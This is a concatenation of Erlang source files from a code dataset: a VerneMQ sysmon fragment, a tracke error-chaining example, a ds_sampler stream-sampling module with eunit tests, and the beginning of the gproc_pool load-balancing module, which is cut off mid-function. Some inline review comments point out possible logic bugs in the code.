%% there's a pathological condition somewhere that's generating
%% lots of unforseen things that crash core's custom handler, we
%% could make things worse by jumping back into the exploding
%% volcano. Wait a little bit before jumping back. Besides, the
%% system_monitor data is nice but is not critical: there is no
%% need to make things worse if things are indeed bad, and if we
%% miss a few seconds of system_monitor events, the world will not
%% end.
timer:sleep(2000),
vmq_sysmon_handler:add_handler(),
{noreply, State};
handle_info(_Info, State) ->
{noreply, State}.
%%--------------------------------------------------------------------
%% @private
%% @doc
%% This function is called by a gen_server when it is about to
%% terminate. It should be the opposite of Module:init/1 and do any
%% necessary cleaning up. When it returns, the gen_server terminates
%% with Reason. The return value is ignored.
%%
%% @spec terminate(Reason, State) -> void()
%% @end
%%--------------------------------------------------------------------
terminate(_Reason, _State) ->
ok.
%%--------------------------------------------------------------------
%% @private
%% @doc
%% Convert process state when code is changed
%%
%% @spec code_change(OldVsn, State, Extra) -> {ok, NewState}
%% @end
%%--------------------------------------------------------------------
code_change(_OldVsn, State, _Extra) ->
{ok, State}.
%%%===================================================================
%%% Internal functions
%%%===================================================================
%% Map the newest sample (rear of the queue) to a load level 0..3;
%% an empty queue yields level 0.
%% NOTE(review): an `undefined' sample compares greater than any number in
%% Erlang term order and therefore yields level 3 — confirm that is intended.
calc(Samples) ->
    case queue:peek_r(Samples) of
        {value, Util} ->
            if
                Util >= 100 -> 3;
                Util >= 90  -> 2;
                Util >= 80  -> 1;
                true        -> 0
            end;
        empty ->
            0
    end.
%% Take one utilization sample via cpu_sup. Returns a single percentage
%% figure (one core's value, or the ad-hoc average over all cores) or
%% `undefined' when cpu_sup does not return a per-cpu list.
%% NOTE(review): an empty Utils list has no matching clause and would
%% raise case_clause — confirm cpu_sup never yields an empty list here.
cpu_sample() ->
    case cpu_sup:util([per_cpu]) of
        Info when is_list(Info) ->
            Utils = [U || {_, U, _, _} <- Info],
            case Utils of
                [U] ->
                    %% only one cpu
                    U;
                [_, _|_] ->
                    %% This is a form of ad-hoc averaging, which tries to
                    %% account for the possibility that the application
                    %% loads the cores unevenly.
                    calc_avg_util(Utils)
            end;
        _ ->
            undefined
    end.
%% Average the per-core utilizations, with a special case for heavily
%% skewed loads (max - min spread above 50 points).
calc_avg_util(Utils) ->
    case minmax(Utils) of
        {A, B} when B-A > 50 ->
            %% very uneven load
            %% NOTE(review): `B - U > 20' keeps the cores more than 20
            %% points BELOW the max — i.e. the lightly loaded ones —
            %% although the variable is named High. Selecting the cores
            %% close to the max would be `B - U =< 20'; confirm intent.
            High = [U || U <- Utils,
                         B - U > 20],
            lists:sum(High) / length(High);
        {Low, High} ->
            %% Load reasonably even: midpoint of min and max.
            (High + Low) / 2
    end.
%% Return {Min, Max} of a non-empty list in a single pass.
minmax([First | Rest]) ->
    Step = fun(X, {Lo, Hi}) ->
                   {erlang:min(X, Lo), erlang:max(X, Hi)}
           end,
    lists:foldl(Step, {First, First}, Rest).
-module(tracke_example).
-include("tracke.hrl").
-compile([{parse_transform, tracke_pt}]).
-export([normal_usage/1,
merge_error_types/1,
deep_chain/0]).
-type tracke(Reason) :: tracke:tracke(Reason).
%% @doc Show you normal usage of tracke.
%% You can see the results on shell using the following codes:
%% tracke_example:normal_usage(0).
%% tracke_example:normal_usage(-100).
%% tracke_example:normal_usage(127).
%% tracke_example:normal_usage(15).
-spec normal_usage(integer()) -> ok.
normal_usage(X) ->
case func1(X) of
{ok, V} ->
io:format("Ok: ~p~n", [V]);
{error, Reason} ->
io:format("~s~n", [tracke:format(Reason)]),
case tracke:reason(Reason) of
zero ->
io:format("Your input is zero.~n", []);
negative ->
io:format("Your input is negative.~n", []);
boring_number ->
io:format("Your input is boring.~n", [])
end
end,
ok.
-spec func1(integer()) -> {ok, binary()} | {error, tracke(zero | negative | boring_number)}.
func1(0) ->
{error, tracke:new(zero)};
func1(X) when X < 0 ->
{error, tracke:new(negative)};
func1(X) ->
case fizzbuzz(X) of
{ok, _} = Ok ->
Ok;
{error, Reason} ->
{error, tracke:chain(Reason)}
end.
-spec fizzbuzz(integer()) -> {ok, binary()} | {error, tracke(boring_number)}.
%% Classic FizzBuzz classification: multiples of 3 are <<"fizz">>,
%% multiples of 5 are <<"buzz">>, multiples of both are <<"fizzbuzz">>;
%% anything else is reported as a boring_number error.
%% FIX: the original mapped multiples of 5 to "fizz" and multiples of 3
%% to "buzz", inverting the universally known FizzBuzz convention.
fizzbuzz(X) ->
    case {X rem 3 =:= 0, X rem 5 =:= 0} of
        {true, true} ->
            {ok, <<"fizzbuzz">>};
        {true, false} ->
            {ok, <<"fizz">>};
        {false, true} ->
            {ok, <<"buzz">>};
        {false, false} ->
            {error, tracke:new(boring_number)}
    end.
%% @doc Create new type from different `tracke/1' types.
%% You can see the results on shell using the following codes:
%% tracke_example:merge_error_types(foo).
%% tracke_example:merge_error_types(bar).
-spec merge_error_types(foo | bar) -> ok.
merge_error_types(Atom) ->
case error_func1(Atom) of
{error, Reason} ->
case tracke:reason(Reason) of
% not_exist ->
% Dialyzer causes an error here.
% io:format("~s~n", [tracke:format(Reason)]);
aaa ->
io:format("~s~n", [tracke:format(Reason)]);
bbb ->
io:format("~s~n", [tracke:format(Reason)])
end
end,
ok.
-spec error_func1(foo | bar) -> {error, tracke(aaa | bbb)}.
error_func1(X) ->
case X of
foo ->
error_func2();
bar ->
error_func3()
end.
-spec error_func2() -> {error, tracke(aaa)}.
error_func2() ->
{error, tracke:new(aaa)}.
-spec error_func3() -> {error, tracke(bbb)}.
error_func3() ->
{error, tracke:new(bbb)}.
%% @doc Create deep chained `tracke()'.
%% You can see the results on shell using the following codes:
%% tracke_example:deep_chain().
-spec deep_chain() -> ok.
deep_chain() ->
case deep_chain3(x, y, z) of
{error, Reason} ->
io:format("~s~n", [tracke:format(Reason)])
end,
ok.
-spec deep_chain1(x) -> {error, tracke(bottom_reason)}.
deep_chain1(_) ->
{error, tracke:new(bottom_reason)}.
-spec deep_chain2(x, y) -> {error, tracke(bottom_reason)}.
deep_chain2(x, y) ->
case deep_chain1(x) of
{error, Reason} ->
{error, tracke:chain(Reason, "hi")}
end.
-spec deep_chain3(x, y, z) -> {error, tracke(bottom_reason)}.
deep_chain3(x, y, z) ->
case deep_chain2(x, y) of
{error, Reason} ->
{error, tracke:chain(Reason)}
end. | src/tracke_example.erl | 0.597373 | 0.500916 | tracke_example.erl | starcoder |
%% -*- coding: utf-8 -*-
%% @private
-module(ds_sampler).
-author("<NAME> <<EMAIL>>").
%% Statistically representative stream sampler
%% See chapter 4.2. Sampling data in a stream
%% in Mining of Massive Datasets, Second Edition, 2014
%% by <NAME>, <NAME> and <NAME>
-export([ new/1
, add/2
, add_hash/2
, join/2
, get_samples/1
, get_size/1
]).
-ifdef(TEST).
-include_lib("eunit/include/eunit.hrl").
-endif.
-record(sampler,
{ capacity % The maximum number of samples to store
, size % Number of currently stored samples
, tree % gb_trees structure of samples
, max_hash % Current upper limit on hash value
}).
%% Initialize a sampler with given capacity.
%% `false' disables sampling entirely — the resulting `undefined' is
%% passed straight through by add/2 and add_hash/2. Otherwise Capacity
%% must be a positive integer or `infinity'; anything else is badarg.
new(false) -> undefined;
new(Capacity) when is_integer(Capacity), Capacity > 0;
                   Capacity =:= infinity ->
    #sampler{capacity = Capacity,
             size = 0,
             tree = gb_trees:empty(),
             max_hash = 0};
new(T) ->
    error(badarg, [T]).
%% Add a value with attributes to the sampler.
%% Attributes are passed to the per-value statistics module
%% that maintains stats for each sampled value.
%% A disabled sampler (undefined) is passed through unchanged.
add(_VA, undefined) -> undefined;
add({V, A}, Sampler) ->
%% Only the value (not its attributes) determines the sample's hash.
Hash = ds_utils:hash(V),
add_hash({Hash, {V, A}}, Sampler).
%% The sampler algorithm requires a hash that maps to 32-bit words.
%% This function is provided as an entry point in case you have already
%% hashed your terms with a suitable function and want to spare another
%% hash computation. In this case, please make sure to use a suitable
%% hash function (ds_utils:hash/1 is strongly recommended)!
%% In case of doubt, just use add/2 above.
add_hash(_Data, undefined) -> undefined;
%% Below capacity: always admit, tracking the largest hash seen so far.
add_hash({Hash, {V, A}}, #sampler{capacity = Capacity,
size = Size0, tree=Tree0,
max_hash = MaxHash0} = Sampler)
when Size0 < Capacity ->
{Tree, Size} = update_tree(Hash, {V, A}, Tree0, Size0),
MaxHash = max(Hash, MaxHash0),
Sampler#sampler{size = Size, max_hash = MaxHash, tree = Tree};
%% At capacity and the hash exceeds the admission threshold: reject.
add_hash({Hash, {_V,_A}}, #sampler{max_hash = MaxHash} = Sampler)
when Hash > MaxHash ->
Sampler;
%% At capacity with an admissible hash: insert, then evict the entry
%% (or the whole collision bucket) holding the largest hash if we
%% overflowed; the new largest hash becomes the admission threshold.
add_hash({Hash, {V, A}}, #sampler{capacity = Capacity,
size = Size0, tree = Tree0} = Sampler) ->
{Tree1, Size1} = update_tree(Hash, {V, A}, Tree0, Size0),
if Size1 > Capacity ->
{_, Value, Tree} = gb_trees:take_largest(Tree1),
Size = case Value of
{_Vmax,_PV} -> Size1 - 1;
Bucket -> Size1 - length(Bucket)
end,
{MaxHash, _} = gb_trees:largest(Tree),
Sampler#sampler{size = Size, max_hash = MaxHash, tree = Tree};
true ->
Sampler#sampler{size = Size1, tree = Tree1}
end.
%% Insert or update {V, A} under Hash. Returns {Tree, Size}; Size grows
%% only when a previously unseen value is added.
update_tree(Hash, {V, A}, Tree0, Size0) ->
case gb_trees:lookup(Hash, Tree0) of
none ->
PV = ds_pvattrs:new(A),
{gb_trees:insert(Hash, {V, PV}, Tree0), Size0 + 1};
{value, {V, PV0}} ->
%% Same value seen again: fold attributes into its stats.
PV = ds_pvattrs:add(A, PV0),
{gb_trees:update(Hash, {V, PV}, Tree0), Size0};
{value, {V1, PV1}} ->
%% hash collision with another single value, convert to list bucket
PV = ds_pvattrs:new(A),
Bucket = [{V, PV}, {V1, PV1}],
{gb_trees:update(Hash, Bucket, Tree0), Size0 + 1};
{value, Bucket0} ->
%% collision occurred earlier on this hash
{Bucket, Size} = update_bucket(Bucket0, {V, A}, Size0),
{gb_trees:update(Hash, Bucket, Tree0), Size}
end.
%% Insert or update value V inside a collision bucket (a list of
%% {Value, PVAttrs} pairs that all share one hash). Returns the new
%% bucket and the updated entry count.
update_bucket(Bucket, {V, A}, Size) ->
    case lists:keyfind(V, 1, Bucket) of
        {V, OldPV} ->
            %% Known value: fold the new attributes into its stats.
            NewPV = ds_pvattrs:add(A, OldPV),
            {lists:keyreplace(V, 1, Bucket, {V, NewPV}), Size};
        false ->
            %% New value colliding on this hash: prepend a fresh entry.
            {[{V, ds_pvattrs:new(A)} | Bucket], Size + 1}
    end.
%% The capacity of the joined sampler will be the maximum of the two.
%% NOTE(review): entries replayed from Tree2 are {Value, PVAttrs}
%% pairs, so add_hash/2 receives a pvattrs term in the attribute
%% position; this assumes ds_pvattrs:new/1 and add/2 accept pvattrs
%% for merging -- verify against ds_pvattrs.
join(undefined, Sampler) -> Sampler;
join(Sampler, undefined) -> Sampler;
%% Normalize so the larger-capacity sampler is the accumulator.
join(#sampler{capacity = Capacity1} = Sampler1,
#sampler{capacity = Capacity2} = Sampler2) when Capacity2 > Capacity1 ->
join(Sampler2, Sampler1);
join(Sampler1, #sampler{tree = Tree2}) ->
lists:foldl(fun({_Hash, {_V,_A}}=Data, Sampler) ->
add_hash(Data, Sampler);
({Hash, Bucket}, Sampler) when is_list(Bucket) ->
%% Replay each member of a collision bucket separately.
lists:foldl(fun(VA, Acc) ->
add_hash({Hash, VA}, Acc)
end, Sampler, Bucket)
end, Sampler1, gb_trees:to_list(Tree2)).
%% Return a list of {V, PV}
%% (collision buckets are flattened so each value appears individually).
get_samples(undefined) -> [];
get_samples(#sampler{tree = Tree}) -> lists:flatten(gb_trees:values(Tree)).
%% Return the number of unique values sampled
%% (maintained incrementally by update_tree/4 and add_hash/2).
get_size(undefined) -> 0;
get_size(#sampler{size = Size}) -> Size.
%% Tests
-ifdef(TEST).
%%-define(DEBUG, true).
-ifdef(DEBUG).
print(#sampler{capacity = Capacity, size = Size, tree = Tree,
max_hash = MaxHash}, Name) ->
io:format(user,
"~nSampler ~s with capacity=~B, size=~B, max_hash=~B~n"
"sampled values with per-value stats:~n~n",
[Name, Capacity, Size, MaxHash]),
[io:format(user, "~10B: ~6w ~p~n", [Hash, V, PV])
|| {Hash, {V, PV}} <- gb_trees:to_list(Tree)],
ok.
-define(print(Sampler), print(Sampler, ??Sampler)).
-else.
-define(print(Sampler), ok).
-endif.
%% Use a weaker hash function when testing collisions.
%% phash2 over a 32-bit range makes the collision pairs/triples listed
%% in collisions_test/0 actually collide; otherwise same as add/2.
ctadd(_VA, undefined) -> undefined;
ctadd({V, A}, Sampler) ->
Hash = erlang:phash2(V, 1 bsl 32),
add_hash({Hash, {V, A}}, Sampler).
new_test() ->
?assertError(badarg, new(0)),
?assertError(badarg, new(nan)),
?assertEqual(#sampler{capacity = 10, size = 0,
max_hash = 0, tree = gb_trees:empty()},
new(10)).
sampler_test() ->
S = lists:foldl(fun add/2, new(50),
[{N, []} || N <- lists:seq(0, 9999)]),
?print(S),
Hist = lists:foldl(fun(N, Acc) ->
orddict:update_counter(N div 100, 1, Acc)
end, orddict:new(), [N || {N, _PV} <- get_samples(S)]),
%% assert some level of uniformity
?assert(length(Hist) > 35),
?assert(lists:max([Count || {_Bin, Count} <- Hist]) =< 4),
ok.
collisions_test() ->
NonColliders = lists:seq(0, 9999),
Colliders =
%% Each row contains numbers that hash to the same value.
[ 22722, 266086
, 26544, 217817
, 33702, 44741
, 38988, 125056
, 47282, 81624
, 125915, 283130
, 300486, 879671
, 302126, 905421
, 302781, 868970
, 302800, 362107
%% triple collisions:
, 70024, 1918936, 4696183
, 1074149, 2805927, 9580072
, 1190377, 1534289, 6156731
, 1235514, 4795238, 6886479
, 2378846, 3760671, 5137463
, 2671427, 7709636, 8682435
, 3635546, 5201779, 5527149
, 4604703, 4879230, 9248585
, 5557231, 5988521, 6524388
, 6161979, 6660282, 7669964
],
S0 = lists:foldl(fun ctadd/2, new(infinity), [{N, []} || N <- NonColliders]),
S1 = lists:foldl(fun ctadd/2, S0, [{N, []} || N <- Colliders]),
SampleCount = length(NonColliders) + length(Colliders),
?assertEqual(SampleCount, length(get_samples(S1))),
SampleValues = lists:sort(Colliders ++ NonColliders),
?assertEqual(SampleValues, [V || {V,_PV} <- lists:sort(get_samples(S1))]).
duplicates_test() ->
Sd = lists:foldl(fun add/2, new(10),
[{N rem 25, [{key, N}]} || N <- lists:seq(0, 9999)]),
?print(Sd),
Counts = [ds_pvattrs:get_count(PV) || {_N, PV} <- get_samples(Sd)],
?assertEqual(10, length(Counts)),
[?assertEqual(400, Count) || Count <- Counts].
join_test() ->
S1 = lists:foldl(fun add/2, new(8),
[{N, [{ts, 10*N}]} || N <- lists:seq(0, 999)]),
?print(S1),
S2 = lists:foldl(fun add/2, new(24),
[{N, [{key, N}]} || N <- lists:seq(1000, 1999)]),
?print(S2),
Sj1 = join(S1, S2),
%% verify that the joined set contains samples from both S1 and S2
{JoinedFromS1, JoinedFromS2} =
lists:partition(fun({V,_PV}) -> V < 1000 end, get_samples(Sj1)),
?assert(length(JoinedFromS1) > 0),
?assert(length(JoinedFromS2) > 0),
?print(Sj1),
Sj2 = join(S1, Sj1),
%% verify that items from S1 have count 2 in Sj2
CountsFromS1 =
[ds_pvattrs:get_count(PV) || {N, PV} <- get_samples(Sj2), N < 1000],
[?assertEqual(2, Count) || Count <- CountsFromS1],
?print(Sj2).
join_with_collisions_test() ->
L1 = [ % collide with self
22722, 266086
, 26544, 217817
, 33702, 44741
, 38988, 125056
% collide with L2
, 302781
, 302800
, 70024, 1918936
, 1074149, 2805927
],
L2 = [ % collide with self
47282, 81624
, 125915, 283130
, 300486, 879671
, 302126, 905421
% collide with L1
, 868970
, 362107
, 1918936, 4696183
, 2805927, 9580072
],
%% we want all samples to fit into one sampler
TotalCap = length(L1) + length(L2),
S1 = lists:foldl(fun ctadd/2, new(TotalCap), [{N, []} || N <- L1]),
?print(S1),
S2 = lists:foldl(fun ctadd/2, new(TotalCap), [{N, []} || N <- L2]),
?print(S2),
Sj = join(S1, S2),
?print(Sj),
RefSamples = lists:usort(L1 ++ L2),
JoinedSamples = get_samples(Sj),
?assertEqual(length(RefSamples), length(JoinedSamples)),
?assertEqual(RefSamples, lists:sort([V || {V,_PV} <- JoinedSamples])).
-endif. | src/ds_sampler.erl | 0.521471 | 0.418994 | ds_sampler.erl | starcoder |
%% ``The contents of this file are subject to the Erlang Public License,
%% Version 1.1, (the "License"); you may not use this file except in
%% compliance with the License. You should have received a copy of the
%% Erlang Public License along with this software. If not, it can be
%% retrieved via the world wide web at http://www.erlang.org/.
%%
%% Software distributed under the License is distributed on an "AS IS"
%% basis, WITHOUT WARRANTY OF ANY KIND, either express or implied. See
%% the License for the specific language governing rights and limitations
%% under the License.
%%
%% The Initial Developer of the Original Code is Ericsson Utvecklings AB.
%% Portions created by Ericsson are Copyright 1999, Ericsson Utvecklings
%% AB. All Rights Reserved.''
%%
%% @author <NAME> <<EMAIL>>
%%
%% @doc Load balancing functions based on Gproc.
%%
%% This module implements support for load-balancing server pools. It was
%% originally intended mainly as an example of how to use various Gproc
%% resources (e.g. counters and shared properties), but is fully integrated
%% into Gproc, and fully functional.
%%
%% <h2>Concepts</h2>
%%
%% Each pool has a list of 'named' workers (defined using `add_worker/2') and
%% a load-balancing strategy. Processes can then 'connect' to the pool (with
%% `connect_worker/2'), using one of the defined names.
%%
%% Users then 'pick' one of the currently connected processes in the pool. Which
%% process is picked depends on the load-balancing strategy.
%%
%% The whole representation of the pool and its connected workers is in gproc.
%% The server `gproc_pool' is used to serialize pool management updates, but
%% worker selection is performed entirely in the calling process, and can be
%% performed by several processes concurrently.
%%
%% <h3>Load-balancing strategies</h3>
%%
%% * `round_robin' is the default. A wrapping gproc counter keeps track of the
%% latest worker picked, and `gproc:next()' is used to find the next worker.
%% * `random' picks a random worker from the pool.
%% * `hash' requires a value (`pick/2'), and picks a worker based on the hash of
%% that value.
%% * `direct' takes an integer as an argument, and picks the next worker (modulo
%% the size of the pool). This is mainly for implementations that implement
%% a load-balancing strategy on top of `gproc_pool'.
%% * `claim' picks the first available worker and 'claims' it while executing
%% a user-provided fun. This means that the number of concurrently executing
%% jobs will not exceed the size of the pool.
%% @end
-module(gproc_pool).
-behavior(gen_server).
%% gproc round-robin name lookup
-export([new/1, % (Pool) -> (Pool, round_robin, [])
new/3, % (Pool, Type, Opts)
delete/1, % (Pool)
force_delete/1, % (Pool)
add_worker/2, % (Pool, Name) -> Pos
add_worker/3, % (Pool, Name, Pos) -> Pos
remove_worker/2, % (Pool, Name)
connect_worker/2, % (Pool, Name)
disconnect_worker/2, % (Pool, Name)
whereis_worker/2, % (Pool, Name)
worker_id/2, % (Pool, Name)
active_workers/1, % (Pool)
defined_workers/1, % (Pool)
worker_pool/1, % (Pool)
pick/1, % (Pool)
pick/2, % (Pool, Value)
pick_worker/1, % (Pool)
pick_worker/2, % (Pool, Value)
claim/2, % (Pool, Fun)
claim/3, % (Pool, Fun, Wait)
log/1, % (WorkerId)
randomize/1]). % (Pool)
-export([start_link/0]).
-export([init/1,
handle_call/3,
handle_cast/2,
handle_info/2,
terminate/2,
code_change/3]).
-export([test/1, test/3, ptest/4, test_run/2, test_run1/2, test_run2/2,
test_run0/2, setup_test_pool/3, setup_test_pool/4,
remove_test_pool/1]).
-define(POOL(Pool), {p,l,{?MODULE,Pool}}).
-define(POOL_CUR(Pool), {c,l,{?MODULE,Pool,cur}}).
-define(POOL_WRK(Pool,Name), {c,l,{?MODULE,Pool,w,Name}}).
-record(st, {}).
%% @spec new(Pool::any()) -> ok
%%
%% @equiv new(Pool, round_robin, [])
new(Pool) ->
%% Defaults: round_robin strategy, no options (size 0, auto_size true).
new(Pool, round_robin, []).
%% @spec new(Pool::any(), Type, Opts) -> true
%% Type = round_robin | random | hash | direct | claim
%% Opts = [{size, integer()} | {auto_size, boolean()}]
%%
%% @doc Create a new pool.
%%
%% The pool starts out empty. If a size is not given, the pool size is set to
%% 0 initially. `auto_size' is `true' by default if size is not specified, but
%% `false' by default otherwise. If `auto_size == true', the pool will be
%% enlarged to accomodate new workers, when necessary. Otherwise, trying to add
%% a worker when the pool is full will raise an exception, as will trying to add
%% a worker on a specific position beyond the current size of the pool.
%%
%% If the given pool already exists, this function will raise an exception.
%% @end
%% The guard mirrors valid_type/1, so an unsupported type fails in the
%% caller (function_clause) before reaching the server.
new(Pool, Type, Opts) when Type == round_robin;
Type == random;
Type == hash;
Type == direct;
Type == claim ->
call({new, Pool, Type, Opts}).
%% @spec delete(Pool::any()) -> true
%% @doc Delete an existing pool.
%%
%% This function will delete a pool, only if there are no connected workers.
%% Ensure that workers have been disconnected before deleting the pool.
%% @end
%%
delete(Pool) ->
%% Serialized through the server; delete_/1 raises not_empty if any
%% worker is still defined in the pool.
call({delete, Pool}).
%% @spec force_delete(Pool::any()) -> true
%% @doc Forcibly remove a pool, terminating all active workers
%%
%% This function is primarily intended for cleanup of any pools that might have
%% become inconsistent (for whatever reason). It will clear out all resources
%% belonging to the pool and send `exit(Pid, kill)' signals to all connected
%% workers (except the calling process).
%% @end
%%
force_delete(Pool) ->
%% This is not pretty, but this function is mainly intended to clean up
%% a pool that's not used, with no regard to connected workers, except self(),
%% (that is, we kill each connected worker). We don't worry about races,
%% so don't go to the server (which doesn't have own state on the pool
%% anyway).
%% Note: runs in the caller's process, unlike the other management calls.
force_delete_(Pool).
%% @spec add_worker(Pool::any(), Name::any()) -> integer()
%%
%% @doc Assign a worker name to the pool, returning the worker's position.
%%
%% Before a worker can connect to the pool, its name must be added. If no explicit
%% position is given (see {@link add_worker/3}), the most suitable position,
%% depending on load-balancing algorithm, is selected: for round_robin and direct
%% pools, names are packed tightly from the beginning; for hash and random pools,
%% slots are filled as sparsely as possible, in order to maintain an even
%% likelihood of hitting each worker.
%%
%% An exception is raised if the pool is full (and `auto_size' is false), or if
%% `Name' already exists in the pool.
%%
%% Before a worker can be used, a process must connect to it (see
%% {@link connect_worker/2}.
%% @end
add_worker(Pool, Name) ->
%% The server picks the slot (see find_slot/6) and returns its position.
call({add_worker, Pool, Name}).
%% @spec add_worker(Pool::any(), Name::any(), Slot::integer()) -> integer()
%%
%% @doc Assign a worker name to a given slot in the pool, returning the slot.
%%
%% This function allows the pool maintainer to exactly position each worker
%% inside the pool. An exception is raised if the position is already taken,
%% or if `Name' already exists in the pool. If `Slot' is larger than the current
%% size of the pool, an exception is raised iff `auto_size' is `false';
%% otherwise the pool is expanded to accomodate the new position.
%% @end
add_worker(Pool, Name, Slot) ->
%% Place Name at an explicit slot; server-side errors are re-raised
%% in the caller by call/1.
call({add_worker, Pool, Name, Slot}).
%% @spec connect_worker(Pool::any(), Name::any()) -> true
%% @doc Connect the current process to `Name' in `Pool'.
%%
%% Typically, a server will call this function as it starts, similarly to when
%% it registers itself. In fact, calling `connect_worker/2' leads to the process
%% being registered as `{n,l,[gproc_pool,N,Name]}', where `N' is the position of
%% `Name' in the pool. This means (a) that gproc monitors the worker, and
%% removes the connection automatically if it dies, and (b) that the registered
%% names can be listed in order of their positions in the pool.
%%
%% This function raises an exception if `Name' does not exist in `Pool' (or
%% there is no such pool), or if another worker is already connected to
%% `Name'.
%% @end
%%
connect_worker(Pool, Name) ->
%% The registered value 0 marks the worker as free; claim/2,3 use it
%% as a mutex. Registration also makes gproc monitor this process.
gproc:reg(worker_id(Pool, Name), 0).
%% @spec disconnect_worker(Pool, Name) -> true
%%
%% @doc Disconnect the current process from `Name' in `Pool'.
%%
%% This function is similar to a `gproc:unreg()' call. It removes the
%% connection between `Pool', `Name' and pid, and makes it possible for another
%% process to connect to `Name'.
%%
%% An exception is raised if there is no prior connection between `Pool',
%% `Name' and the current process.
%% @end
%%
disconnect_worker(Pool, Name) ->
%% Plain gproc unregistration of the worker's unique name.
gproc:unreg(worker_id(Pool, Name)).
%% @spec remove_worker(Pool::any(), Name::any()) -> true
%% @doc Remove a previously added worker.
%%
%% This function will assume that any connected worker is disconnected first.
%% It will fail if there is no such pool, but will return `true' in the case
%% when `Name' did not exist in the pool in the first place.
%% @end
remove_worker(Pool, Name) ->
%% Serialized through the server; raises {worker_connected, Pid} if a
%% worker is still connected under Name.
call({remove_worker, Pool, Name}).
%% @spec whereis_worker(Pool::any(), Name::any()) -> pid() | undefined
%% @doc Look up the pid of a connected worker.
%%
%% This function works similarly to `gproc:where/1': it will return the pid
%% of the worker connected as `Pool / Name', if there is such a worker; otherwise
%% it will return `undefined'. It will raise an exception if `Name' has not been
%% added to the pool.
%% @end
whereis_worker(Pool, Name) ->
ID = worker_id(Pool, Name),
%% gproc:where/1 yields the registered pid, or undefined.
gproc:where(ID).
%% @spec worker_id(Pool, Name) -> GprocName
%% @doc Return the unique gproc name corresponding to a name in the pool.
%%
%% This function assumes that `Name' has been added to `Pool'. It returns the
%% unique name that a connected worker will be registered as. This doesn't mean
%% that there is, in fact, such a connected worker.
%% @end
worker_id(Pool, Name) ->
%% The slot position is stored as attribute 'n' on the worker's shared
%% counter (see reg_worker/3); it is part of the unique name.
N = gproc:get_attribute(?POOL_WRK(Pool, Name), shared, n),
{n, l, [?MODULE, Pool, N, Name]}.
%% @spec active_workers(Pool::any()) -> [{Name, Pid}]
%% @doc Return a list of currently connected workers in the pool.
%%
active_workers(Pool) ->
%% Match registered worker names {n,l,[?MODULE,Pool,Pos,Name]}; the
%% is_integer guard on the position field excludes unrelated entries.
gproc:select(
{l,n},
[{ {{n,l,[?MODULE,Pool,'$1','$2']},'$3','_'}, [{is_integer, '$1'}],
[{{'$2', '$3'}}] }]).
%% @spec defined_workers(Pool::any()) -> [{Name, Pos, Count}]
%% @doc Return a list of added workers in the pool.
%%
%% The added workers are slots in the pool that have been given names, and thus
%% can be connected to. This function doesn't detect whether or not there are
%% any connected (active) workers.
%%
%% The list contains `{Name, Pos, Count}', where `Name' is the name of the added
%% worker, `Pos' is its position in the pool, and `Count' represents the number
%% of times the worker has been picked (assuming callers keep count by explicitly
%% calling {@link log/1}).
%% @end
defined_workers(Pool) ->
K = ?POOL(Pool),
%% Pair each named slot with its shared pick counter (see log/1).
[{N, Pos, gproc:get_value(?POOL_WRK(Pool, N), shared)}
|| {N, Pos} <- get_workers_(K)].
%% @spec worker_pool(Pool::any()) -> [integer() | {Name, Pos}]
%% @doc Return a list of slots and/or named workers in the pool.
%%
%% This function is mainly for testing, but can also be useful when implementing
%% your own worker placement algorithm on top of gproc_pool.
%%
%% A plain integer represents an unfilled slot, and `{Name, Pos}' represents an
%% added worker. The pool is always filled to the current size.
%% @end
worker_pool(Pool) ->
%% Raw slot list: integers are free slots, {Name, Pos} are assigned.
get_workers_(?POOL(Pool)).
%% @spec pick(Pool::any()) -> GprocName | false
%% @doc Pick a worker from the pool given the pool's load-balancing algorithm.
%%
%% The pool types that allows picking without an extra argument are
%% round_robin and random. This function returns `false' if there is no available
%% worker, or if `Pool' is not a valid pool.
%% @end
pick(Pool) ->
%% The pool's shared value holds {Size, Type}. Empty pools give false;
%% pools whose type needs an argument (hash/direct) or claim pools
%% are a badarg here.
case gproc:get_value(?POOL(Pool), shared) of
{0, _} -> false;
{Sz, Type} when Type == round_robin; Type == random ->
pick(Pool, Sz, Type, name);
_ ->
error(badarg)
end.
%% @spec pick_worker(Pool::any()) -> pid() | false
%% @doc Pick a worker pid from the pool given the pool's load-balancing algorithm.
%%
%% Like {@link pick/1}, but returns the worker pid instead of the name.
%% @end
pick_worker(Pool) ->
%% Same dispatch as pick/1, but resolves the picked name to its pid.
case gproc:get_value(?POOL(Pool), shared) of
{0, _} -> false;
{Sz, Type} when Type == round_robin; Type == random ->
pick(Pool, Sz, Type, pid);
_ ->
error(badarg)
end.
%% @spec pick(Pool::any(), Value::any()) -> GprocName | false
%% @doc Pick a worker from the pool based on `Value'.
%%
%% The pool types that allows picking based on an extra argument are
%% hash and direct. This function returns `false' if there is no available
%% worker, or if `Pool' is not a valid pool.
%%
%% If the pool is of type `direct', `Value' must be an integer corresponding to
%% a position in the pool (modulo the size of the pool). If the type is
%% `hash', `Value' may be any term, and its hash value will serve as a guide for
%% selecting a worker.
%% @end
pick(Pool, N) ->
%% Only hash and direct pools accept a selection argument; any other
%% type is a badarg. Empty pools give false.
case gproc:get_value(?POOL(Pool), shared) of
{0, _} -> false;
{Sz, Type} when Type == hash; Type == direct ->
pick(Pool, Sz, Type, N, name);
_ ->
error(badarg)
end.
%% @spec pick_worker(Pool::any(), Value::any()) -> pid() | false
%% @doc Pick a worker pid from the pool given the pool's load-balancing algorithm.
%%
%% Like {@link pick/2}, but returns the worker pid instead of the name.
%% @end
pick_worker(Pool, N) ->
%% Same dispatch as pick/2, but resolves the picked name to its pid.
case gproc:get_value(?POOL(Pool), shared) of
{0, _} -> false;
{Sz, Type} when Type == hash; Type == direct ->
pick(Pool, Sz, Type, N, pid);
_ ->
error(badarg)
end.
%% Strategy-specific selection, performed entirely in the caller.
%% round_robin: advance the wrapping 'cur' counter (incr/3, defined
%% later in this file), then find the first registered worker at or
%% after that slot in gproc's ordered table. The probe key
%% {n,l,[?MODULE,Pool,Next]} sorts just before any worker name
%% {n,l,[?MODULE,Pool,Next,Name]}, so a worker AT slot Next is found.
pick(Pool, Sz, round_robin, Ret) ->
Next = incr(Pool, 1, Sz),
case ets:next(gproc, {{n,l,[?MODULE,Pool,Next]},n}) of
{{n,l,[?MODULE,Pool,Actual,_Name]} = Pick, _} ->
case Actual - Next of
Diff when Diff > 1 ->
%% Slots between Next and Actual are vacant; advance the
%% counter past them so the next pick resumes after Actual.
gproc:update_counter(
?POOL_CUR(Pool), shared, {Diff, Sz, 1}),
ret(Pick, Ret);
_ ->
